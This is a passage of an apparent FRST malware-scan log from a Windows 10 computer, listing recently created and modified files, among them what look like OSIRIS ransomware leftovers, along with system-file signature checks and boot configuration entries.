2016-12-03 08:33 - 2016-12-03 08:33 - 00024280 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbuspipe.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BtaMPM.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00023312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\urssynopsys.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WSDPrint.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kdnic.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00022800 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdxata.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\genericusbfn.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\AcpiDev.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00018704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\isapnp.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wmiacpi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sfloppy.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsilog.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hyperkbd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00016704 _____ (Microsoft Corporation) C:\WINDOWS\system32\HalExtIntcLpioDMA.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\MTConfig.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00015120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelide.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpipmi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014656 _____ (Microsoft Corporation) C:\WINDOWS\system32\HalExtPL080.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00014608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msisadrv.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WindowsTrustedRTProxy.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00014096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\swenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\umpass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\errdev.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpitime.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmgencounter.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serscan.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpipagr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00012560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciide.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00012048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volume.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00011992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\drmkaud.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CIRCoInst.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00011536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spacedump.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmgid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00009728 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\bcmfn2.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00009216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vms3cap.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00001913 _____ C:\WINDOWS\system32\@WindowsUpdate.240.png
2016-12-03 08:27 - 2016-12-28 22:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2c46be4)
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2c1371c)
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2bea754)
2016-12-03 02:56 - 2016-12-03 02:56 - 00000000 _____ C:\GLOB(0x2a5572c)
2016-12-03 02:55 - 2017-01-24 11:52 - 00000000 ____D C:\Windows
2016-12-03 02:55 - 2017-01-24 11:36 - 00000000 ____D C:\WINDOWS\System32
2016-12-03 02:55 - 2017-01-24 11:31 - 16777216 _____ C:\WINDOWS\system32\config\SYSTEM
2016-12-03 02:55 - 2017-01-24 11:31 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2016-12-03 02:55 - 2017-01-24 11:31 - 00524288 _____ C:\WINDOWS\system32\config\DEFAULT
2016-12-03 02:55 - 2017-01-24 11:31 - 00057344 _____ C:\WINDOWS\system32\config\SECURITY
2016-12-03 02:55 - 2017-01-24 10:44 - 00000000 ____D C:\WINDOWS\SysWOW64
2016-12-03 02:55 - 2017-01-24 10:24 - 06029312 _____ C:\WINDOWS\system32\config\DRIVERS
2016-12-03 02:55 - 2017-01-23 18:42 - 00000000 __RHD C:\Users\Default
2016-12-03 02:55 - 2017-01-06 13:46 - 29622272 _____ C:\WINDOWS\system32\config\COMPONENTS
2016-12-03 02:55 - 2017-01-04 15:32 - 00000000 ____D C:\WINDOWS\WinSxS
2016-12-03 02:55 - 2017-01-03 12:24 - 00000000 ____D C:\WINDOWS\system32\config
2016-12-03 02:55 - 2017-01-02 16:49 - 00069632 _____ C:\WINDOWS\system32\config\SAM
2016-12-03 02:55 - 2016-12-26 08:52 - 00000000 ____D C:\WINDOWS\Logs
2016-12-03 02:55 - 2016-12-23 12:22 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-03 02:55 - 2016-12-21 19:51 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-12-03 02:55 - 2016-12-21 19:34 - 00000000 ___RD C:\Users
2016-12-03 02:55 - 2016-12-21 19:30 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-12-03 02:55 - 2016-12-03 09:52 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-12-03 02:55 - 2016-12-03 09:52 - 00000000 ____D C:\WINDOWS\servicing
2016-12-03 02:55 - 2016-12-03 08:42 - 00000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2016-12-03 02:55 - 2016-12-03 08:42 - 00000000 ____D C:\WINDOWS\system32\CatRoot
2016-12-03 02:55 - 2016-12-03 08:42 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2016-12-03 02:55 - 2016-12-03 02:56 - 00053743 _____ C:\GLOB(0x22b727c)
2016-12-03 02:55 - 2016-12-03 02:56 - 00004184 _____ C:\GLOB(0x210727c)
2016-12-03 02:55 - 2016-12-03 02:56 - 00003546 _____ C:\GLOB(0x231727c)
2016-12-03 02:55 - 2016-12-03 02:56 - 00003414 _____ C:\GLOB(0x22e727c)
2016-12-03 02:55 - 2016-12-03 02:55 - 20971520 ___SH C:\WINDOWS\system32\config\SOFTWARE.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 16416768 ___SH C:\WINDOWS\system32\config\SOFTWARE.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 07340032 ___SH C:\WINDOWS\system32\config\COMPONENTS.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 02760704 ___SH C:\WINDOWS\system32\config\SYSTEM.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 02621440 ___SH C:\WINDOWS\system32\config\SYSTEM.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 01040384 ___SH C:\WINDOWS\system32\config\DRIVERS.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00903952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00860432 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmiEngine.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00524288 ___SH C:\WINDOWS\system32\config\BBI{120e2566-b936-11e6-a947-e41d2d740e30}.TMContainer00000000000000000002.regtrans-ms
2016-12-03 02:55 - 2016-12-03 02:55 - 00524288 ___SH C:\WINDOWS\system32\config\BBI{120e2566-b936-11e6-a947-e41d2d740e30}.TMContainer00000000000000000001.regtrans-ms
2016-12-03 02:55 - 2016-12-03 02:55 - 00319488 ___SH C:\WINDOWS\system32\config\BBI.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00280336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdscore.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\PkgMgr.exe
2016-12-03 02:55 - 2016-12-03 02:55 - 00212992 ___SH C:\WINDOWS\system32\config\BBI.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00149264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2016-12-03 02:55 - 2016-12-03 02:55 - 00131856 _____ (Microsoft Corporation) C:\WINDOWS\system32\SSShim.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00131072 ___SH C:\WINDOWS\system32\config\DEFAULT.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetDriverInstall.dll
2016-12-03 02:55 - 2016-12-03 02:55 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2016-12-03 02:55 - 2016-12-03 02:55 - 00098304 ___SH C:\WINDOWS\system32\config\DEFAULT.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SECURITY.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SECURITY.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SAM.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\SAM.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00065536 ___SH C:\WINDOWS\system32\config\BBI{120e2566-b936-11e6-a947-e41d2d740e30}.TM.blf
2016-12-03 02:55 - 2016-12-03 02:55 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00008192 ___SH C:\WINDOWS\system32\config\COMPONENTS.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ___SH C:\WINDOWS\system32\config\ELAM.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ___SH C:\Users\Default\NTUSER.DAT.LOG2
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ___SH C:\Users\Default\NTUSER.DAT.LOG1
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ____D C:\WINDOWS\system32\SMI
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 ____D C:\WINDOWS\system32\downlevel
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2c4c6e4)
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2c1d23c)
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2bed23c)
2016-12-03 02:55 - 2016-12-03 02:55 - 00000000 _____ C:\GLOB(0x2a5921c)
2016-11-21 16:04 - 2016-11-21 16:04 - 00002087 _____ C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
2016-11-21 16:01 - 2017-01-12 13:58 - 00000000 ____D C:\Users\nepta\Downloads\HP Downloads
2016-11-21 15:58 - 2016-11-21 15:58 - 00000000 ____D C:\Users\nepta\Documents\HpReg_Backup
2016-11-19 12:50 - 2016-11-19 12:50 - 00019083 _____ C:\Users\nepta\Documents\WIN-9VDBKK3EQVE.speccy
2016-11-19 12:48 - 2016-12-21 19:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy
2016-11-19 12:47 - 2016-11-19 12:48 - 06290016 _____ (Piriform Ltd) C:\Users\nepta\Downloads\spsetup130.exe
2016-11-19 12:46 - 2016-11-19 12:48 - 00000839 _____ C:\Users\Public\Desktop\Speccy.lnk
2016-11-19 12:46 - 2016-11-19 12:46 - 00000000 ____D C:\Program Files\Speccy
2016-11-19 12:43 - 2016-11-19 12:45 - 05201280 _____ (Piriform Ltd) C:\Users\nepta\Downloads\spsetup129.exe
2016-11-19 12:06 - 2016-11-19 12:06 - 00000000 ___HD C:\$SysReset
2016-11-12 15:03 - 2016-11-12 15:03 - 15564308 _____ C:\Users\nepta\Downloads\haidt.APA-2016-lecture-on-polarization.for-posting.compressed.pptx.crdownload
2016-11-05 04:36 - 2016-12-21 19:48 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-11-05 04:27 - 2016-11-05 04:27 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShieldProviderService.exe
2016-11-05 04:27 - 2016-11-05 04:27 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\DefenderShield.dll
2016-11-05 04:27 - 2016-11-05 04:27 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.WelcomeScreen.dll
2016-11-05 04:27 - 2016-11-05 04:27 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShieldProviderProxyStub.dll
2016-11-05 04:26 - 2016-11-05 04:26 - 01812219 ____N C:\WINDOWS\system32\ActionCenterWelcomeImage.png
2016-11-05 04:26 - 2016-11-05 04:26 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.WelcomeScreen.dll
2016-11-05 04:26 - 2016-11-05 04:26 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2016-11-05 04:26 - 2016-11-05 04:26 - 00000639 ____N C:\WINDOWS\system32\@ActionCenterToastIcon.png
2016-11-05 04:25 - 2016-11-05 04:25 - 18491904 _____ (Microsoft Corporation) C:\WINDOWS\system32\HydrogenCompositor.dll
2016-11-04 13:16 - 2016-10-31 05:15 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-11-04 13:16 - 2016-10-31 04:29 - 00192000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-11-03 08:55 - 2016-12-21 19:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
2016-10-27 13:09 - 2016-12-21 19:39 - 00000000 ____D C:\Users\nepta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Xmarks
2016-10-27 13:09 - 2016-10-27 13:09 - 00000000 ____D C:\Program Files (x86)\Xmarks

==================== Three Months Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-24 14:24 - 2015-07-09 13:18 - 00000000 ____D C:\AdwCleaner
2017-01-24 12:29 - 2015-10-19 15:25 - 00093480 _____ C:\Users\nepta\AppData\Local\GDIPFONTCACHEV1.DAT
2017-01-24 11:29 - 2015-11-04 15:18 - 00000000 ____D C:\Users\nepta\AppData\Local\Xmarks
2017-01-24 10:44 - 2015-10-22 12:19 - 00002211 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Belarc Advisor.lnk
2017-01-24 10:41 - 2016-08-15 18:17 - 00000000 ____D C:\Program Files\SUPERAntiSpyware
2017-01-24 10:37 - 2015-10-20 15:26 - 00000000 ____D C:\Users\nepta\AppData\Roaming\KeePass
2017-01-24 10:24 - 2015-10-19 14:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2017-01-24 10:23 - 2016-03-19 10:15 - 00000000 ____D C:\WINDOWS\ShellNew
2017-01-24 08:53 - 2016-08-28 06:04 - 00000000 ____D C:\ProgramData\FitbitConnect
2017-01-23 18:42 - 2015-06-29 08:54 - 00000000 ____D C:\Users\nepta\Desktop\Retrieved
2017-01-23 18:40 - 2015-12-02 19:08 - 00000000 ____D C:\Users\nepta\Desktop\Steph's Work Folder
2017-01-23 18:36 - 2016-06-30 08:33 - 00000000 ____D C:\Users\nepta\Downloads\Drawing Programs
2017-01-23 18:27 - 2015-08-25 19:18 - 00000000 ____D C:\Users\nepta\Desktop\Stacee Work Folder
2017-01-23 18:22 - 2016-06-03 15:45 - 00000000 ____D C:\Users\nepta\Desktop\Finances
2017-01-23 18:22 - 2015-09-06 12:10 - 00000000 ____D C:\Users\nepta\Desktop\Menues
2017-01-23 18:22 - 2011-02-11 10:32 - 00000000 __RHD C:\SYSTEM.SAV
2017-01-23 18:22 - 2011-02-11 10:32 - 00000000 ____D C:\SWSETUP
2017-01-23 18:21 - 2016-04-26 16:58 - 00000000 ____D C:\Users\Public\Documents\Wondershare
2017-01-23 18:21 - 2013-08-22 14:37 - 00000000 ____D C:\GRAPHPAP
2017-01-23 18:20 - 2016-07-23 10:57 - 00000000 ____D C:\Users\nepta\Documents\City Application
2017-01-23 18:20 - 2015-11-05 13:15 - 00000000 ____D C:\Users\nepta\Documents\pixie
2017-01-23 18:20 - 2014-10-26 14:07 - 00000000 ____D C:\RecoveryImage
2017-01-23 18:18 - 2016-04-10 17:30 - 00000000 ____D C:\Users\nepta\Documents\Finances Stephanie
2017-01-19 13:06 - 2016-01-21 11:30 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-01-18 13:25 - 2015-10-20 12:41 - 00000442 _____ C:\Users\nepta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\My Passport (K).lnk
2017-01-10 13:21 - 2015-10-20 11:13 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-01-10 13:19 - 2016-08-14 15:36 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-01-10 13:18 - 2015-10-20 11:13 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-01-09 13:03 - 2015-10-19 16:09 - 00000167 _____ C:\WINDOWS\win.ini
2017-01-09 09:43 - 2015-10-21 15:41 - 00001192 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeePass 2.lnk
2017-01-09 09:43 - 2015-10-21 15:41 - 00000000 ____D C:\Program Files (x86)\KeePass Password Safe 2
2017-01-02 16:55 - 2016-06-23 16:45 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware

==================== Files in the root of some directories =======

2016-10-01 17:39 - 2016-10-01 17:39 - 0038411 _____ () C:\Users\nepta\AppData\Roaming\Microsoft Excel 97-2003.ADR
2016-10-01 17:34 - 2016-11-29 15:26 - 0009301 _____ () C:\Users\nepta\AppData\Roaming\Microsoft Excel 97-2003.EML
2016-04-09 08:14 - 2016-04-09 08:14 - 0000017 _____ () C:\Users\nepta\AppData\Local\resmon.resmoncfg
2017-01-23 18:21 - 2017-01-23 18:21 - 0003592 _____ () C:\ProgramData\346FD420--07CA--C4B7--4928A8E6--FA91EDB292F1.osiris
2015-11-05 18:28 - 2015-11-05 18:28 - 0000057 _____ () C:\ProgramData\Ament.ini
2017-01-23 18:21 - 2017-01-23 18:21 - 0008182 _____ () C:\ProgramData\OSIRIS-a761.htm

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== BCD ================================

Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume1
description             Windows Boot Manager
locale                  en-US
inherit                 {globalsettings}
flightsigning           Yes
default                 {current}
resumeobject            {04d461d9-c7f6-11e6-8d9d-9dd2077c58d7}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 0

Windows Boot Loader
-------------------
identifier              {01381978-4adb-11e5-90ec-a1eca10b6741}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{01381979-4adb-11e5-90ec-a1eca10b6741}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{01381979-4adb-11e5-90ec-a1eca10b6741}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \WINDOWS\system32\winload.exe
description             Windows 10
locale                  en-US
inherit                 {bootloadersettings}
recoverysequence        {84377094-c7f6-11e6-8d9d-9dd2077c58d7}
displaymessageoverride  Recovery
recoveryenabled         Yes
flightsigning           Yes
allowedinmemorysettings 0x15000075
osdevice                partition=C:
systemroot              \WINDOWS
resumeobject            {04d461d9-c7f6-11e6-8d9d-9dd2077c58d7}
nx                      OptIn
bootmenupolicy          Standard

Windows Boot Loader
-------------------
identifier              {07f471a3-3b00-11e1-8ee8-d0df9ade1364}
device                  ramdisk=[D:]\Recovery\WindowsRE\Winre.wim,{07f471a4-3b00-11e1-8ee8-d0df9ade1364}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[D:]\Recovery\WindowsRE\Winre.wim,{07f471a4-3b00-11e1-8ee8-d0df9ade1364}
systemroot              \windows
nx                      OptIn
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {0a3beb22-9fbe-11e5-bc98-a742e1ee1e86}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0a3beb23-9fbe-11e5-bc98-a742e1ee1e86}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0a3beb23-9fbe-11e5-bc98-a742e1ee1e86}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {0bc6c150-5d4e-11e4-b3b5-8fd73e18ab92}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0bc6c151-5d4e-11e4-b3b5-8fd73e18ab92}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{0bc6c151-5d4e-11e4-b3b5-8fd73e18ab92}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {1817421a-fe03-11e5-a48d-a04756c6d275}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1817421b-fe03-11e5-a48d-a04756c6d275}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1817421b-fe03-11e5-a48d-a04756c6d275}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {1c337f50-5892-11e5-ba10-d3779ebad293}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c337f51-5892-11e5-ba10-d3779ebad293}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c337f51-5892-11e5-ba10-d3779ebad293}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {1c75c318-69ca-11e5-9cf9-9ab429923201}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c75c319-69ca-11e5-9cf9-9ab429923201}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{1c75c319-69ca-11e5-9cf9-9ab429923201}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {27b924d8-f19a-11e4-b309-96fcc1ebdff1}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{27b924d9-f19a-11e4-b309-96fcc1ebdff1}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-GB
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{27b924d9-f19a-11e4-b309-96fcc1ebdff1}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {2af3ba9e-26f9-11e5-92d8-c964757cb674}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{2af3ba9f-26f9-11e5-92d8-c964757cb674}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{2af3ba9f-26f9-11e5-92d8-c964757cb674}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {362d5e24-90eb-11e6-9cba-ce2631d934cd}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{362d5e25-90eb-11e6-9cba-ce2631d934cd}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{362d5e25-90eb-11e6-9cba-ce2631d934cd}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {39802f98-0e1c-11e5-826f-9d41d4129edd}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{39802f99-0e1c-11e5-826f-9d41d4129edd}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{39802f99-0e1c-11e5-826f-9d41d4129edd}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {46bc2ade-4ef4-11e6-b864-8e4e49a5f15c}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{46bc2adf-4ef4-11e6-b864-8e4e49a5f15c}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{46bc2adf-4ef4-11e6-b864-8e4e49a5f15c}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {4e494be6-a82c-11e4-9f21-bbcb7c4ae7c6}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{4e494be7-a82c-11e4-9f21-bbcb7c4ae7c6}
